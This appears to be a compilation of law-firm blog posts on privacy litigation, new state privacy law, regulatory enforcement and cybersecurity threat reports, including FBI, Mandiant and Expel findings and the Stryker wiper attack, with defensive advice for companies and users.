The Federal Bureau of Investigation (FBI) recently released a FLASH warning highlighting malicious cyber activity conducted by threat actors operating on behalf of Iran’s Ministry of Intelligence and Security. According to the FBI, these threat actors are using Telegram as a command-and-control infrastructure to push malware “targeting Iranian dissidents, journalists opposed to Iran, and other opposition groups around the world.” The FLASH was released “to maximize awareness of malicious Iranian cyber activity and provide mitigation strategies to reduce the risk of compromise” in light of the “elevated geopolitical climate of the Middle East and current conflict.”  

The FLASH is designed to warn network defenders, and the public, of continued malicious cyber activity by Iranian-backed cyber actors, and provides the tactics, techniques, and procedures used in this malware campaign.

The FBI notes that the threat actors use Signal to deploy various malware versions to infect machines running Windows operating systems and “could be used to target any individual of interest to Iran.”

According to the FLASH, the threat actors used social engineering to masquerade as commonly used programs or services on Windows machines. After compromise, they then “connected the infected machine to Telegram command and control bots that enabled remote user access to exfiltrate screen captures or files from the victim devices.” The threat actors include Handala Hack, which claimed responsibility for the Stryker attack. Handala Hack is also linked to another entity known as “Homeland Justice.”

Iranian-backed hackers continue to pose a threat to all companies because they leverage legitimate messaging apps like Telegram (through no fault of its own) to deliver payloads. If you or your company uses Telegram, or another messaging app, it is imperative to understand how these legitimate tools are used maliciously by threat actors. Follow the FBI’s guidelines and educate your users to this increased risk.

A new class action in the U.S. District Court for the Northern District of California alleges that Ace Hardware tracked users’ online activity through third-party tools before users could make meaningful choices through cookie consent tools, and that it continued even after users took steps to opt out. The plaintiffs claim that the Ace Hardware website intercepted browsing data before consent choices could be made, promised opt-out control but did not honor it, and used multiple third-party tools to collect detailed activity. Specifically, the complaint alleges tools from Google Analytics, Bazaarvoice, and other companies were used to collect information such as search terms, product views, and device identifiers.

In plain terms, the lawsuit frames the issue as a mismatch between what users were told about their privacy choices and what allegedly happened behind the scenes. While the lawsuit focuses on Ace Hardware’s website practices, it also reflects on the broader scrutiny of third-party analytics and marketing tools, especially where consent mechanisms are alleged to be ineffective or misleading.

Even when companies believe they have implemented standard consent banners, plaintiffs increasingly focus on what the underlying scripts actually do in real time. This case is a reminder that privacy risk often turns on implementation details, not policy language. Companies should pressure-test consent flows against what tags and pixels actually transmit, including on first page load and after opt-out selections. Aligning disclosures, consent settings, and real-time script behavior is increasingly where litigation exposure is won or lost.

On March 20, 2026, Oklahoma Governor Kevin Stitt signed into law Enrolled Senate Bill No. 546, a comprehensive privacy law that will go into effect on January 1, 2027—this makes Oklahoma the 21st state to enact a comprehensive privacy law. The bill follows the common model used in many state privacy statutes: it grants consumers baseline privacy rights, requires opt-outs for targeted advertising and certain disclosures, and expects companies to document and manage higher-risk processing.

In general, the law applies to a controller or processor doing business in Oklahoma, or targeting Oklahoma residents, and, during a calendar year, either controls or processes personal data of at least 100,000 consumers, or controls/processes personal data of at least 25,000 consumers and derives over 50% of gross revenue from the sale of personal data.

Consumers have rights to access and confirm processing, correct inaccuracies, delete personal data (including data “provided by or obtained about” the consumer), obtain portable data the consumer provided, and opt out of targeted advertising, the sale of personal data, and certain profiling with significant effects.

“Sale” is the exchange of personal data for monetary consideration, with carve-outs including disclosures to processors, for requested services, and to affiliates. Notably, this is narrower than laws in states that include “valuable consideration” in the definition of sale. “Sensitive data” includesprecise geolocation, biometric data used for unique identification, and known children’s data, and generally requires opt-in consent.

The statute also calls for data minimization and reasonable security, required privacy notice disclosures (including clear disclosure of sale/targeted advertising, where applicable), and data protection assessments for targeted advertising, sale of personal data, sensitive data processing, and certain profiling/high-risk processing. It will be enforced by the Attorney General, includes a 30-day cure process, and provides no private right of action. Companies should use the lead time to confirm applicability and operationalize opt-outs, consent, consumer requests, vendor controls, and assessments.

Mandiant recently issued its M-Trends 2026 Report, a must read for all cybersecurity professionals. The report provides several conclusions and insights, including that both nation states and run of the mill financially motivated threat actors are “integrating AI to accelerate the attack lifecycle.” These threat actors are “increasingly relying on large language models (LLMs) as a strategic force multiplier to move beyond mass email campaigns toward hyper-personalized, rapport-building, social engineering.”      

Speaking of social engineering, the report also highlights that threat actors are using vishing campaigns more frequently and quite successfully. Vishing now holds the number two slot in how threat actors successfully attack companies. We have seen an increase in successful vishing campaigns, and the Mandiant Report confirms that threat actors are increasingly using this attack vector over other methods. This highlights the continued need to educate employees (including customer service representatives, help desk, and human resources employees) on these tactics and to implement internal processes to address identity management.

And, of course, ransomware is as prevalent and catastrophic as ever. The report concludes that ransomware attackers are increasing the pressure on companies to pay by “systematically targeting backup infrastructure, identity services, and virtualization management planes” to limit a company’s ability to recover. Therefore, Mandiant suggests that companies prioritize these areas to give them a better posture to recover.

The Mandiant Report provides a real-world analysis of recent threats (and suggestions to mitigate them) that is useful for security professionals to assess current risks.

Carfax, Inc. faced an early loss in a closely-watched privacy case under the federal Driver’s Privacy Protection Act (DPPA), after a judge in Maryland refused to throw out a proposed class action alleging the company sold drivers’ personal information sourced from crash and vehicle records. The plaintiff alleges that Carfax obtained his DPPA-protected personal information from a crash report tied to a 2023 auto accident and then sold that data to third parties. He claims this happened without his consent and without Carfax ensuring that downstream recipients were entitled to receive the information under the DPPA.

On Monday, Judge Julie R. Rubin of the U.S. District Court for the District of Maryland denied Carfax’s motion to dismiss. The court held that the plaintiff plausibly alleged Carfax obtained and sold his DPPA-protected information for an impermissible purpose under the statute. Importantly, Judge Rubin signaled that this is not the final word on the merits. She denied the motion to dismiss without foreclosing Carfax from reasserting its arguments later. The company can renew its legal challenges at summary judgment, once there is a “full record” showing how the crash report was actually prepared and handled.

Carfax argued that the crash report at issue was not covered by the DPPA because it was obtained from a police department, not from a department of motor vehicles. The plaintiff responded that the report should still qualify as a covered “motor vehicle record” because it was generated by the Maryland Motor Vehicle Administration before being provided to police. Judge Rubin acknowledged that the case law is mixed on this issue, and she described Carfax’s argument as “well-taken” and raising “serious questions (if not doubts)” about the plaintiff’s ability to ultimately prevail. Still, she concluded the uncertainty in the law did not justify dismissal at the pleading stage, especially without a developed factual record clarifying the report’s creation and flow. Carfax also argued that the plaintiff’s claim that Carfax lacked a permissible purpose was too conclusory. Judge Rubin agreed the allegations “could certainly be more robust,” but found them sufficient when considered alongside the allegations about Carfax’s business model and practices. The complaint, as described, alleges Carfax collects and sells vehicle history and accident data from thousands of sources and markets access to a database of more than 1.5 million police reports. At this stage, that context helped bridge the gap between “possible” and “plausible.”

This ruling is a reminder of a practical reality in privacy class actions. Motions to dismiss often fail when the dispute turns on how data was sourced, processed, and sold, since those details frequently sit with the defendant and emerge in discovery. For companies that traffic in large-scale driver and crash datasets, the opinion also highlights two recurring DPPA pressure points: (1) whether a document is a covered “motor vehicle record” can depend on provenance and process, not just where a defendant says it got the record; and (2) even if a company claims a DPPA-compliant use, plaintiffs may survive early dismissal by alleging the seller did not verify that purchasers were entitled to receive the data.

According to Security.org, “every 4.9 seconds, someone becomes a victim of identity theft in the United States” and the Federal Trade Commission receives over 6.4 million reports of identity theft and fraud every year.

Identity theft incidents continue to climb, with the average amount lost reaching $400 per person. The highest number of cases are attributed to financial fraud, including credit card fraud, including stolen credit cards and opening fraudulent new accounts, and fraudulent bank transfers.

Interestingly, age and residence have an impact on the prevalence of identity theft. Millennials are hit the hardest, with 42% of millennials becoming identity theft victims, compared to 24% of Generation X, 21% of Generation Z, and a mere 11% of Baby Boomers. That said, Baby Boomers suffer the largest losses per incident due to bank account fraud. If you live in Florida, you are at higher risk, which contrasts with South Dakota, which has the lowest geographic risk.

Security.org suggests that simple measures can be taken to prevent identity theft, including checking your credit report, setting up account alerts, and reviewing privacy settings on social media accounts. Additional measures I’d like to include are:

  • multi factor authentication on all financial accounts;
  • checking explanation of benefit statements;
  • being wary of vishing, phishing, smishing, and quishing requests;
  • avoiding providing your credentials to anyone;
  • avoiding any money transfer authentication through email;
  • limiting sharing on social media; and
  • staying informed of new fraud techniques.

Cybersecurity firm Expel recently published its 2026 Threat Report, which analyzed over 1,000,000 alerts in its Security Operations Center throughout 2025. The results showed that threat actors continue to use compromised credentials to gain access to company systems. The Report highlights the need for companies to educate their employees on an ongoing basis of how important it is to protect their usernames and passwords and to be highly vigilant when being asked to divulge them.

According to the Report, more than 68% of reported incidents were identity-based: where a threat actor attempts to use an authorized user’s credentials to access a company’s network. Many used agents that the organization did not authorize, a clear indication that it was not the authorized user trying to logon. In addition, 12% of incidents involved a logon from a suspicious location, showing that companies may wish to monitor and block any logon attempts from unauthorized locations, including foreign countries.

The Report notes that “fake PDF editors continue to be a major problem.” If a user does not have access to a company sanctioned PDF editor, users may search on the Internet for one to assist with editing a PDF to make a project easier. If a user downloads a fake PDF editor like SupremePDF, the user is unaware that the fake PDF editor can “install backdoors, hijack users’ browsers, access stored credentials, execute arbitrary code, intercept sensitive information, and download arbitrary payloads.”

According to Expel,

these “PDF editors” are actually trojans, which use their safe-looking outer shell to establish a foothold on your endpoints. The malware maintains persistence, making sure that the software creates a service that runs on the endpoint, keeping the PDF editor running. We often see these editors then used as a backdoor to run malicious code on the host, commonly abusing encoded PowerShell to download a second payload.

Once the threat actor downloads the second payload, it can then move laterally on the network and steal data. Companies may wish to consider providing a sanctioned PDF editor so users are not tempted to find one on the Internet. This is another security tip to pass along to users as many unsuspecting users have no idea that threat actors use these tools to gain access to a network.

If you haven’t scheduled your cybersecurity annual training yet, now is the time. There are new (and old) schemes that threat actors are using to attack users and keeping your employees abreast of these schemes heightens their awareness and vigilance, which protects company data.

As we reported last week, Stryker was attacked by Iranian-backed hackers in retaliation for Israeli and U.S. strikes against Iran. It was a significant cyberattack, known as a wiper attack. A wiper attack is designed not to extort money from a victim, but instead to send a message and destroy the victim’s data to cripple their operations. Stryker was a victim of a political attack that had a significant negative effect on its business operations. It was merely conducting business and got caught in the crosshairs of an international war.

Stryker has been transparent about the incident and how it has affected its products. Being a victim of a wiper attack is bad enough. But unfortunately, it became victimized again when, while responding to the cyberattack, it was sued by a former customer service employee alleging that Stryker failed to secure data and alleging a data breach. It is confounding to me to try to understand how the plaintiff can possibly allege a data breach when the attack just happened and an investigation was just starting.

The facts surrounding the Stryker attack will continue to develop, and Stryker will no doubt comply with an legal obligations that ultimately arise from the incident. That said, it is deeply disappointing to see an opportunistic plaintiff and counsel hit Stryker before facts are known, before any notification letters are sent (if even applicable), and while the company was down and actively responding to a significant attack.

Stryker should be allowed the time to assess what happened, respond appropriately, restore its operations, and complete its investigation before anyone determines whether a viable claim exists. Filing suit within days of the incident is premature and only serves as a distraction.

I feel particular empathy toward Stryker, as it took the hit for a political message—something that could have happened to any company. We  should learn from this incident and support the company, rather than pile on while it is still working to recover.

The California Privacy Protection Agency (CPPA) issued a decision requiring Ford Motor Company to pay a fine of $375,703 and update its privacy practices following a settlement for its alleged violations of the California Consumer Privacy Act (CCPA). Under the CCPA, California residents have the right to direct a business to stop selling or sharing their personal information by opting out. According to the CPPA’s decision, Ford’s opt-out process for personal information collected through its digital properties and connected vehicle services required an identity verification step. Specifically, consumers had to verify their email address as part of the opt-out workflow. The CPPA concluded this added “unnecessary friction” for consumers trying to exercise their rights.

The result was not just added inconvenience, but the CPPA stated that Ford did not process opt-out requests unless the consumer completed the email verification step. Following the CPPA’s investigation, Ford has since processed opt-out requests that lacked verification. Further, in addition to the monetary fine, Ford must also conduct an audit of the tracking technologies on its website and ensure compliance with opt-out preference signals, including the Global Privacy Control.

This enforcement action highlights an increasingly practical regulatory focus. The question is not only whether an opt-out mechanism exists on paper, but also whether it works in a way that consumers can realistically use.

This matter signals that the CPPA is looking at the connected vehicle ecosystems and related digital properties, not just traditional web-only businesses. The lesson here is that if consumers must take extra steps that are not essential to submit or effectuate an opt-out, regulators may view that as deterring a consumer’s ability to exercise their rights.

A federal court in the Southern District of California declined to dismiss wiretapping and eavesdropping claims tied to Skullcandy Inc.’s alleged use of online trackers on its retail website, allowing the lawsuit to move forward. Plaintiff alleges that Skullcandy used tracking tools from Meta Platforms and Google to collect browser and purchase data. Jones v. Skullcandy, Inc., No. 3:2025cv01759 (S.D. Cal. 3/12/26).

The allegations include the use of the Meta Pixel, Google Analytics, and DoubleClick in violation of the California Invasion of Privacy Act. Skullcandy argued the California court lacked jurisdiction, but the district court judge was persuaded that it could exercise specific jurisdiction, focusing on the allegation that Skullcandy aimed its conduct at California through the use of the tracking technologies at issue. Skullcandy sought to transfer the case to Utah, where it has its principal place of business—the court was not convinced. The court focused on the fact that the plaintiff chose to sue in California where the alleged conduct took place, and that the plaintiff expected that class members would be in that state. This decision highlights that venue and jurisdiction defenses may be difficult to win when plaintiffs tie the alleged tracking conduct to the forum state. Even if your website terms of use call out governing law as the state in which you have your principal place of business, you may still be stuck in California court.